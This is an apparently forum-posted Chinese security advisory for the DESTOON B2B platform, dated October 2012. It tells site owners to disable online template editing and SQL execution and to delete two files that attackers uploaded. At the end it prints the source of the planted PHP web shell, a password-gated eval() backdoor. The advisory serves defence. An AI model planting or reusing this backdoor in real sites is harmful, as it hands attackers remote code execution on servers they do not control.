DESTOON B2B緊急安全公告20121010

andy15703166

由于后臺模板管理權限過大存在安全隱患，可能導致部分用戶遭遇黑客攻擊，為了您的網(wǎng)站安全，請看到此公告之后立即做以下處理：

一、修改根目錄config.inc.php修改 $CFG['edittpl'] = '1'; 為 $CFG['edittpl'] = '0'; 禁用在線編輯模板功能，$CFG['executesql'] 也建議設置為 0 禁用后臺執(zhí)行SQL功能。3.0及以下版本用戶，請臨時刪除admin/template.inc.php以免遭遇攻擊。

二、檢查站點目錄是否存在file/swfupload/editor.php和company/link/link.php，如果存在，請立即刪除，注意file/swfupload/editor.inc.php為系統(tǒng)正常文件，請不要誤刪。

設置過偽靜態(tài)并且站點目錄權限設置嚴格的用戶不受此影響，請看到的用戶相互轉(zhuǎn)告，盡快處理。

提示：

系統(tǒng)需要設置可寫的目錄和文件詳見：http://help.destoon.com/install/68.html，其他文件和目錄請不要設置寫入權限。

利用Rewrite規(guī)則設置網(wǎng)站安全：http://help.destoon.com/skill/71.html

PS:
黑客上傳文件file/swfupload/editor.php 和 link.php文件源碼：

1. <?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>

復制代碼